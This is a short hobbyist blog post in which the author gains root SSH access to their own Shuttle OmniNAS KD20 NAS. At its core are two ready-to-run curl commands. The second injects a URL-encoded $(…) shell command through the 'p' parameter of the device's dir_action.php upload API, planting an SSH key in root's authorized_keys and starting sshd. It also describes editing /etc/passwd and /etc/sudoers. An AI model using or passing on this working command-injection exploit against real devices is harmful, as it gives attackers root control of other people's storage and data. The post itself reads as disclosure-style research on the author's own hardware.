In the previous post I detailed a security vulnerability in the firmware for the Shutte OmniNAS KD20. In an attempt to remedy Samba bug #10584 I was trying to get more direct access to my OmniNAS. I already tried to start sshd and telnetd, but with no real success (they were running, logging in was a problem though).
I wanted to get in without making too much changes, by putting a SSH public key on the share and pointing SSHD to it. But since that didn't work out I copied /etc/passwd to the disk share and cat
-ed it back (using tee
as well) with my user's shell set to /bin/ash
. That allowed me to log in after starting sshd, but adding my account to /etc/sudoers was required to get to the next level of control.
Once I was in and with root permissions I was able to diagnose why my initial attempt didn't work. A simple sshd -p 8022 -d
showed me that there was a permissions 'problem', because SSHD is secure by default and ignores authorized keys with write permissions for other users. An additional chmod
fixed that as well, which brings me to the following two lines to accomplish root SSH access to the Shuttle OmniNAS KD20:
curl -F 'userfile=@.ssh/id_rsa.pub;filename=id_rsa.pub' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload' curl -F 'userfile=@/dev/null;filename=test.txt' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload&p=%24(sudo%20mkdir%20%2Froot%2F.ssh%3B%20sudo%20chmod%20700%20%2Froot%2F.ssh%3B%20sudo%20cp%20%2Fshare%2Fatonnas%2Fdisk%2Fid_rsa.pub%20%2Froot%2F.ssh%2Fauthorized_keys%3B%20sudo%20chown%20-R%20root%3Aroot%20%2Froot%2F.ssh%3B%20sudo%20chmod%20644%20%2Froot%2F.ssh%2Fauthorized_keys%3B%20sudo%20chmod%20755%20%2Froot%3B%20sudo%20%2Fbin%2Fsshd)'
In the above two lines the first line copies id_rsa.pub to the disk share, the second line copies it to /root/.ssh/authorized_keys, sets permissions that are acceptable for SSHD and starts sshd
.
Now all you need to do is ssh root@192.168.x.x
and you're in!
Happy hacking!